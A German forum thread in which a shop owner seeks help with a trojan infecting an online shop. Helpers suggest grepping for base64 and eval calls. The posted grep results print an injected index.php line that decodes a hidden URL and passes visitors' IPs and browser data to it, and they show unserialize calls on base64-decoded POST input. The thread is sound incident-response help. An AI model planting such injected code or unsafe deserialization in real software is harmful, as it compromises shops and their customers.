Trojaner Virus im Shop

[Alfred]

Hallo,

findest du das?

aHR0cDovL2dlbmlldGllZC5vcmcvYTEx

Gruß

[lonesomewalker]

Suche in Deiner .htaccess-Datei...

[webmaster-uk]

@Alfred

aHR0cDovL2dlbmlldGllZC5vcmcvYTEx
Nein, das findet er mir auch nicht wenn ich mit Notepad++ suche im kompletten Shopverzeichnis.

@lonesomewalker
Die einzige .htaccess-Datei die ich habe liegt nicht im Shop sondern ist für die normale Webseite und dort steht nur zwei Links von der Seite drin. Im Shop habe ich keine .htaccess-Datei oder wo soll die liegen?

[Phantom]

Ich hatte kürzlich auch sowas in der Art. Schau mal nach den FTP logs, bei mir war da sehr schön jede geänderte Datei aufgeführt. Zudem hatten alle infizierten Dateien einen anderen Zeitstempel als der Rest.

[ut2k3]

Hallo webmaster-uk,

Hattest du FileZilla als FTP-Client? Durch such mal deine Dateien nach folgendem "eval(base64_decode)" oder einfach nur nach "eval". Findet sich da was?

[Phantom]

Bei mir war sowas drin:

Code: PHP  [Auswählen]

echo(gzinflate(base64_decode.........

[webmaster-uk]

also als ich nur nach "eavl" gesucht habe, hatte er mir 626 hits in 103 files angezeigt, das ist aber verfälscht da er auch Kundenandressen etc angezeigt hat.

also ich nur nach "base64_decode" gesucht habe, hat er 6 hits in 4 files gefunden.
Hier die Auswertung

...shop\admin\xtbooster.php (3 hits)
   Line 99:    $ITEM_ID = unserialize(base64_decode($_POST['request']));
   Line 269:       $item['PRODUCT_ID'] = implode(unserialize(base64_decode($_POST['request'])));
   Line 272:    { $item = unserialize(base64_decode($_POST['request'])); }
...shop\includes\classes\xtbooster.php (1 hits)
   Line 87:          if($val[0]=='-'&&$val[1]=='=') $val = trim(base64_decode(substr($val,2,strlen($val)-2)));
...shop\includes\iclear\nusoap.php (1 hits)
   Line 6269:          return base64_decode($value);
...shop\index.php (1 hits)
   Line 77:         $stCurlLink = base64_decode( 'aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);

was mache ich jetzt damit? einfach raus löschen? wenn ja was muss ich da genau löschen und muss ich noch was anderes schauen?

Ich habe heute erneut eine Nachricht von einem Kunden bekommen das er sich einen Trojaner von der Seite eingefangen hat aber mein Virenprogramm zeigt mir nichts an. Nur den Link den ich oben gepostet hat. Ich bin so langsam am verzweifeln. was kann ich denn noch unternehmen?

[Phantom]

Hol einen Fachmann!

Der Hacker kann alles mögliche gemacht haben, base64_decode ist nur eine dieser Möglichkeiten.
Dateidatum, FTPlogs????????
Dateien mit einer sauberen Sicherung verglichen?

Bei mir war der "Virus" nur aktiv, wenn jemand über Google kam. Bei Direkteingabe der URL war alles sauber.

[webmaster-uk]

Kann es hier jemand im Forum machen? für eine Entlohnung versteht sich?
Da es dringend ist warte ich noch bis zum Sonntag ab, wenn ich das von hier nichts gehört habe schaue ich mal lokal noch einem der mir helfen kann, da ich ja übers we sowieso nichts erreichen kann.

Aber danke bis jetzt für die tatkräftige und Hilfreiche Unterstützung

[Ceciro]

Hallo,

nimm doch Kontakt mit dem Team (Premium Support) über das Menü oben (Marktplatz > Kontakt) auf.

Die kennen das Shopsystem in- und auswendig und wissen, was sie tun (müssen). Das mag auf den ersten Blick teurer erscheinen, aber vor Ort muss sich erst jemand einarbeiten zzgl. Umsatzausfälle, das wird dann unter dem Strich häufig teurer.

Ich denke da geht jetzt Vetrauen von Seiten der Kundschaft verloren und dieser Zustand sollte so schnell wie möglich behoben werden.

Gruß und ich drück beide Daumen.

[webmaster-uk]

ok, vielen dank. Supportanfrage ist gerade raus 

Danke für die Starke Hilfe von euch allen hier im Forum und für die Mühe. Ihr seit TOP